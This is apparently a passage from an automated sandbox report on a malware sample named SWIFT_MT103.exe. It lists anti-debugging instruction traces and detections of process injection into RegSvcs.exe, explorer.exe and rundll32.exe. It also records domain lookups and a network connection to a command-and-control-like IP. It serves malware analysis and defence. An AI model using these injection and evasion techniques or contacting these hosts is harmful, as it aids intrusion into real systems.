          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04473884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04473884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04433D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04473540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04417D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04414120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0447A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04484257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0443927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04428E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04408A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04413A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04434A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04434A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04438EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04422AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0440FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04423B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04423B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0441F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0448FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0442E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_043FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_044203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.garagekuhn.com
          Source: C:\Windows\explorer.exeDomain query: www.bodymoisturizer.online
          Source: C:\Windows\explorer.exeNetwork Connect: 155.133.142.5 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3388
